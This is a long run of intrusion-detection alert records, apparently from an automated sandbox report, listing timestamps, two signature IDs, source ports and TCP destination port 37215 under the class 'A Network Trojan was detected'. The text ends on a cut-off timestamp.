          Timestamp:06/08/24-15:05:32.353802
          SID:2829579
          Source Port:56180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461725
          SID:2829579
          Source Port:54192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353046
          SID:2835222
          Source Port:50058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266515
          SID:2829579
          Source Port:53312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891903
          SID:2835222
          Source Port:55502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.107054
          SID:2829579
          Source Port:41494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111863
          SID:2835222
          Source Port:42378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857444
          SID:2835222
          Source Port:52542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730233
          SID:2835222
          Source Port:36872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016498
          SID:2829579
          Source Port:58500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.749148
          SID:2829579
          Source Port:41922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816788
          SID:2829579
          Source Port:59058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514059
          SID:2835222
          Source Port:41774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514607
          SID:2829579
          Source Port:39942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888366
          SID:2835222
          Source Port:46852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471951
          SID:2835222
          Source Port:57420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706025
          SID:2835222
          Source Port:56712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132630
          SID:2835222
          Source Port:45408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462882
          SID:2829579
          Source Port:53400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787854
          SID:2835222
          Source Port:47912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795773
          SID:2829579
          Source Port:48040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.822959
          SID:2829579
          Source Port:51274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742146
          SID:2829579
          Source Port:37998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554604
          SID:2835222
          Source Port:40116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115193
          SID:2835222
          Source Port:35072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.703588
          SID:2835222
          Source Port:57830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744065
          SID:2829579
          Source Port:51470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517863
          SID:2829579
          Source Port:48756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705637
          SID:2835222
          Source Port:56522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274454
          SID:2829579
          Source Port:50942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115975
          SID:2835222
          Source Port:38078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131269
          SID:2829579
          Source Port:52252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.853781
          SID:2829579
          Source Port:58040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744349
          SID:2829579
          Source Port:45942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731831
          SID:2835222
          Source Port:55460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892402
          SID:2829579
          Source Port:55624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271617
          SID:2835222
          Source Port:60014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075601
          SID:2835222
          Source Port:56686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135537
          SID:2835222
          Source Port:34032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.303176
          SID:2835222
          Source Port:43492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241502
          SID:2835222
          Source Port:38204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131159
          SID:2835222
          Source Port:50742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174313
          SID:2835222
          Source Port:49544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744858
          SID:2835222
          Source Port:33760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160360
          SID:2829579
          Source Port:45832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352417
          SID:2829579
          Source Port:43334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.749225
          SID:2829579
          Source Port:58004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.110084
          SID:2829579
          Source Port:35472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355214
          SID:2835222
          Source Port:36238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407945
          SID:2835222
          Source Port:48574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353328
          SID:2829579
          Source Port:47032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602064
          SID:2829579
          Source Port:34362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897542
          SID:2829579
          Source Port:45140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816569
          SID:2829579
          Source Port:35368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241453
          SID:2835222
          Source Port:39396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446510
          SID:2829579
          Source Port:52700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780230
          SID:2829579
          Source Port:54374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.303206
          SID:2829579
          Source Port:35254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263893
          SID:2835222
          Source Port:49662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884129
          SID:2835222
          Source Port:45090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739135
          SID:2835222
          Source Port:37778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177371
          SID:2835222
          Source Port:55052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465649
          SID:2835222
          Source Port:35248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745463
          SID:2835222
          Source Port:32818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351945
          SID:2829579
          Source Port:50716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471545
          SID:2835222
          Source Port:59220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792034
          SID:2829579
          Source Port:45970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732198
          SID:2835222
          Source Port:34326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515699
          SID:2829579
          Source Port:37160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.159308
          SID:2829579
          Source Port:38564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517247
          SID:2835222
          Source Port:44718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808690
          SID:2829579
          Source Port:32878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.187974
          SID:2829579
          Source Port:47702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781984
          SID:2829579
          Source Port:41318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606375
          SID:2829579
          Source Port:42398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158864
          SID:2829579
          Source Port:37290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.843886
          SID:2835222
          Source Port:41572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.056334
          SID:2835222
          Source Port:55080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410837
          SID:2829579
          Source Port:56806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.085389
          SID:2829579
          Source Port:57796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306137
          SID:2829579
          Source Port:43088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.850706
          SID:2829579
          Source Port:58570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548042
          SID:2835222
          Source Port:56062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176069
          SID:2835222
          Source Port:39938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731594
          SID:2829579
          Source Port:58926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236817
          SID:2835222
          Source Port:54768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819293
          SID:2835222
          Source Port:39478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.070795
          SID:2829579
          Source Port:41084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152621
          SID:2829579
          Source Port:50204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602820
          SID:2835222
          Source Port:34750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014691
          SID:2829579
          Source Port:40680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.829889
          SID:2835222
          Source Port:37126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233481
          SID:2829579
          Source Port:50476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020990
          SID:2835222
          Source Port:59906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897055
          SID:2835222
          Source Port:43632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.740943
          SID:2829579
          Source Port:56104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264421
          SID:2829579
          Source Port:54598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705266
          SID:2829579
          Source Port:58746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016553
          SID:2829579
          Source Port:44844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158650
          SID:2835222
          Source Port:37392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.553145
          SID:2835222
          Source Port:48752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178737
          SID:2835222
          Source Port:53254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791592
          SID:2835222
          Source Port:49642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604778
          SID:2835222
          Source Port:49524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155389
          SID:2829579
          Source Port:36398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191668
          SID:2835222
          Source Port:57062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175245
          SID:2829579
          Source Port:45056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734446
          SID:2835222
          Source Port:34940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275757
          SID:2829579
          Source Port:44246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734511
          SID:2829579
          Source Port:56232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747304
          SID:2829579
          Source Port:59160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132906
          SID:2829579
          Source Port:33972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273155
          SID:2829579
          Source Port:56498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780512
          SID:2835222
          Source Port:44990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406262
          SID:2829579
          Source Port:43182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.083067
          SID:2829579
          Source Port:48282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271336
          SID:2835222
          Source Port:34562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037168
          SID:2829579
          Source Port:53870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782435
          SID:2829579
          Source Port:51180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.895794
          SID:2835222
          Source Port:48498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461760
          SID:2829579
          Source Port:33030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667697
          SID:2829579
          Source Port:33204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551494
          SID:2835222
          Source Port:40282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403766
          SID:2829579
          Source Port:42388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136127
          SID:2835222
          Source Port:36288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153642
          SID:2835222
          Source Port:47130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800976
          SID:2835222
          Source Port:40694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160045
          SID:2829579
          Source Port:50258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667620
          SID:2835222
          Source Port:60276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460211
          SID:2835222
          Source Port:39154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446042
          SID:2835222
          Source Port:50744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787280
          SID:2835222
          Source Port:58360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.147752
          SID:2835222
          Source Port:39636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.025884
          SID:2829579
          Source Port:56492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731360
          SID:2835222
          Source Port:57098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160747
          SID:2829579
          Source Port:41926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405252
          SID:2829579
          Source Port:46606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888566
          SID:2835222
          Source Port:35188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271563
          SID:2835222
          Source Port:56530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158903
          SID:2835222
          Source Port:48704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740750
          SID:2835222
          Source Port:45510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019057
          SID:2835222
          Source Port:43392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021960
          SID:2829579
          Source Port:43206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448817
          SID:2829579
          Source Port:51864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067996
          SID:2835222
          Source Port:50190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446728
          SID:2835222
          Source Port:34022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238575
          SID:2829579
          Source Port:41212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787564
          SID:2829579
          Source Port:41862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545941
          SID:2835222
          Source Port:59016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746396
          SID:2835222
          Source Port:57726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600757
          SID:2829579
          Source Port:58084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351450
          SID:2835222
          Source Port:45614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860297
          SID:2829579
          Source Port:52776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407739
          SID:2835222
          Source Port:48878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741412
          SID:2835222
          Source Port:34182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514314
          SID:2829579
          Source Port:46300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510567
          SID:2829579
          Source Port:36474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352017
          SID:2835222
          Source Port:45084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.163232
          SID:2835222
          Source Port:54864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.861318
          SID:2829579
          Source Port:37476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262314
          SID:2835222
          Source Port:38516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550931
          SID:2835222
          Source Port:41486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730153
          SID:2829579
          Source Port:47732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731052
          SID:2835222
          Source Port:55540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.025899
          SID:2835222
          Source Port:58706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.178492
          SID:2829579
          Source Port:55752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709373
          SID:2835222
          Source Port:52518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.156107
          SID:2835222
          Source Port:55432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352264
          SID:2829579
          Source Port:59848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707760
          SID:2829579
          Source Port:41776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178689
          SID:2835222
          Source Port:39172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.084852
          SID:2829579
          Source Port:55450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463216
          SID:2835222
          Source Port:52650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600788
          SID:2829579
          Source Port:37886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548439
          SID:2829579
          Source Port:40220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810752
          SID:2829579
          Source Port:58850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449988
          SID:2829579
          Source Port:45500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173057
          SID:2829579
          Source Port:52050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270448
          SID:2829579
          Source Port:46128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896860
          SID:2829579
          Source Port:40330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005818
          SID:2829579
          Source Port:46034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463521
          SID:2829579
          Source Port:47512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087965
          SID:2829579
          Source Port:40386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744896
          SID:2829579
          Source Port:36876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599398
          SID:2835222
          Source Port:39516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.125892
          SID:2829579
          Source Port:40188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127371
          SID:2835222
          Source Port:49060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516758
          SID:2829579
          Source Port:38674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733435
          SID:2829579
          Source Port:46424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819098
          SID:2829579
          Source Port:55100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126900
          SID:2829579
          Source Port:45508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355820
          SID:2835222
          Source Port:44820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606405
          SID:2829579
          Source Port:60746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273591
          SID:2829579
          Source Port:48982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740955
          SID:2835222
          Source Port:48170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.516143
          SID:2829579
          Source Port:60034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854372
          SID:2829579
          Source Port:35078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111200
